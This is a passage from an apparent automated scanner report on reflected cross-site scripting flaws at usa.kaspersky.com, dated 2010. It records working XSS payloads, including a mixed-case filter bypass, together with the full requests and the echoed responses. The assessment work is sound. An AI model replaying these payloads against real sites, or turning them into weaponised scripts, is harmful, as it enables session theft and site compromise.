Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:31:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686283"
Content-Type: text/html; charset=utf-8
Content-Length: 31579
Date: Sat, 18 Dec 2010 15:31:33 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-downloads/password-manager?fa4b6"><script>alert(1)</script>847f16d6988=1" />
...[SNIP]...

1.115. http://usa.kaspersky.com/downloads/product-updates [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-updates

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29959"><script>alert(1)</script>c47033a0e64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads29959"><script>alert(1)</script>c47033a0e64/product-updates HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686518"
Content-Type: text/html; charset=utf-8
Content-Length: 30199
Date: Sat, 18 Dec 2010 15:35:21 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads29959"><script>alert(1)</script>c47033a0e64/product-updates" />
...[SNIP]...

1.116. http://usa.kaspersky.com/downloads/product-updates [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-updates

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e240b"-alert(1)-"de57a04823e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloadse240b"-alert(1)-"de57a04823e/product-updates HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686538"
Content-Type: text/html; charset=utf-8
Content-Length: 32663
Date: Sat, 18 Dec 2010 15:35:45 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloadse240b"-alert(1)-"de57a04823e/product-updates";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.117. http://usa.kaspersky.com/downloads/product-updates [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-updates

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ed4</script><ScRiPt>alert(1)</ScRiPt>00282098243 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /downloads/product-updates21ed4</script><ScRiPt>alert(1)</ScRiPt>00282098243 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:38:39 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686719"
Content-Type: text/html; charset=utf-8
Content-Length: 30365
Date: Sat, 18 Dec 2010 15:38:43 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/product-updates21ed4</script><ScRiPt>alert(1)</ScRiPt>00282098243";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.118. http://usa.kaspersky.com/downloads/product-updates [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-updates

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 282fa"><script>alert(1)</script>742b5ad4846 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-updates282fa"><script>alert(1)</script>742b5ad4846 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686662"
Content-Type: text/html; charset=utf-8
Content-Length: 30325
Date: Sat, 18 Dec 2010 15:37:47 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-updates282fa"><script>alert(1)</script>742b5ad4846" />
...[SNIP]...

1.119. http://usa.kaspersky.com/downloads/product-updates [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/product-updates

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12c84"><script>alert(1)</script>a12dbe4425f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/product-updates?12c84"><script>alert(1)</script>a12dbe4425f=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686347"
Content-Type: text/html; charset=utf-8
Content-Length: 48743
Date: Sat, 18 Dec 2010 15:32:38 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/product-updates?12c84"><script>alert(1)</script>a12dbe4425f=1" />
...[SNIP]...

1.120. http://usa.kaspersky.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97f52"><script>alert(1)</script>9ced6055bae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html97f52"><script>alert(1)</script>9ced6055bae HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:11:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685068"
Content-Type: text/html; charset=utf-8
Content-Length: 30108
Date: Sat, 18 Dec 2010 15:11:14 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html97f52"><script>alert(1)</script>9ced6055bae" />
...[SNIP]...

1.121. http://usa.kaspersky.com/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e97"-alert(1)-"161d3687da3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.html54e97"-alert(1)-"161d3687da3 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:11:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685084"
Content-Type: text/html; charset=utf-8
Content-Length: 30012
Date: Sat, 18 Dec 2010 15:11:29 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html54e97"-alert(1)-"161d3687da3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.122. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e8e"><script>alert(1)</script>ed3a017e866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?d5e8e"><script>alert(1)</script>ed3a017e866=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:08:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684892"
Content-Type: text/html; charset=utf-8
Content-Length: 33742
Date: Sat, 18 Dec 2010 15:08:24 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?d5e8e"><script>alert(1)</script>ed3a017e866=1" />
...[SNIP]...

1.123. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b59ac"-alert(1)-"2a2647fd9e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.html?b59ac"-alert(1)-"2a2647fd9e3=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:09:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684945"
Content-Type: text/html; charset=utf-8
Content-Length: 33662
Date: Sat, 18 Dec 2010 15:09:14 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
{ s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html?b59ac"-alert(1)-"2a2647fd9e3=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.124. http://usa.kaspersky.com/kaspersky-for-business [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /kaspersky-for-business

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 640c3"-alert(1)-"a5b8a088a7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kaspersky-for-business640c3"-alert(1)-"a5b8a088a7b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686638"
Content-Type: text/html; charset=utf-8
Content-Length: 30084
Date: Sat, 18 Dec 2010 15:37:24 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
= " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/kaspersky-for-business640c3"-alert(1)-"a5b8a088a7b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.125. http://usa.kaspersky.com/kaspersky-for-business [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /kaspersky-for-business

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7523d"><script>alert(1)</script>ce4c655c4e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kaspersky-for-business7523d"><script>alert(1)</script>ce4c655c4e8 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:36:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686613"
Content-Type: text/html; charset=utf-8
Content-Length: 30181
Date: Sat, 18 Dec 2010 15:37:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/kaspersky-for-business7523d"><script>alert(1)</script>ce4c655c4e8" />
...[SNIP]...

1.126. http://usa.kaspersky.com/kaspersky-for-business [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /kaspersky-for-business

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cebe7"><script>alert(1)</script>6ba6cc3a289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kaspersky-for-business?cebe7"><script>alert(1)</script>6ba6cc3a289=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:34:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686487"
Content-Type: text/html; charset=utf-8
Content-Length: 34726
Date: Sat, 18 Dec 2010 15:34:55 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/kaspersky-for-business?cebe7"><script>alert(1)</script>6ba6cc3a289=1" />
...[SNIP]...

1.127. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a37a"><script>alert(1)</script>80ab69cbec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.css2a37a"><script>alert(1)</script>80ab69cbec8 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:07:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684877"
Content-Type: text/html; charset=utf-8
Content-Length: 30199
Date: Sat, 18 Dec 2010 15:08:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
